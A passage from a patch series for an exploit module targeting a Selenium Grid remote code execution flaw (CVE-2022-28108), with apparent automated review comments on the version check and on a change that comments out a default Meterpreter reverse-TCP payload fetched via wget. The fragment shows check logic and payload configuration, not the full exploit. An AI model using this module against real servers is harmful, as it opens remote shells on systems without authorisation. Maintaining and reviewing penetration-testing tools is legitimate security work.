normalize_uri(target_uri.path) + }) return Exploit::CheckCode::Unknown('Unexpected server reply.') unless v3res&.code == 200 js_code = v3res.get_html_document.css('script').find { |script| script.text.match(/var json = Object.freeze\('(.*?)'\);/) } From 0f71c896e5d15cc2656b29522f1ecfdafc1e1be0 Mon Sep 17 00:00:00 2001 From: Diego Ledda Date: Tue, 7 Jan 2025 10:47:04 +0100 Subject: [PATCH 23/23] chore: removing PAYLOAD from DefaultOptions --- .../linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb index d66636c563e9..0df68c1f4119 100644 
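Review bot: The early `return Exploit::CheckCode::Detected('Selenium Grid version 4.x detected.')` fires for any `/status` reply mentioning "selenium grid" without looking at the version, although the module description limits the bug to builds before 4.0.0-alpha-7, so AutoCheck will go on to launch the exploit against patched 4.x servers. If the `/status` document carries a build or node version string (I believe Grid 4 reports one), parsing it with `Rex::Version` and returning `Safe` for releases at or after 4.0.0-alpha-7, as the v3 path below already does, would keep the check from green-lighting non-vulnerable hosts; if it does not, a comment stating that the 4.x branch cannot distinguish fixed builds would at least document the limitation. Binding the document once, `doc = v4res&.get_json_document`, would also shorten the five-line condition. `check` continues after this hunk.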
--- a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb +++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb @@ -36,7 +36,7 @@ def initialize(info = {}) 'Linux Command', { 'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd, 'DefaultOptions' => { - 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp', + # tested cmd/linux/http/x64/meterpreter_reverse_tcp 'FETCH_COMMAND' => 'WGET' } }
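Review bot: The replacement line `# tested cmd/linux/http/x64/meterpreter_reverse_tcp` leaves a commented-out-looking entry inside the target's `DefaultOptions` hash, where it reads as a disabled setting rather than documentation. Since the tested payload is already shown in the module documentation's scenarios, dropping the comment, or moving it above the target entry as `# Verified with cmd/linux/http/x64/meterpreter_reverse_tcp`, keeps the options hash to live settings. The `initialize` body extends beyond this hunk.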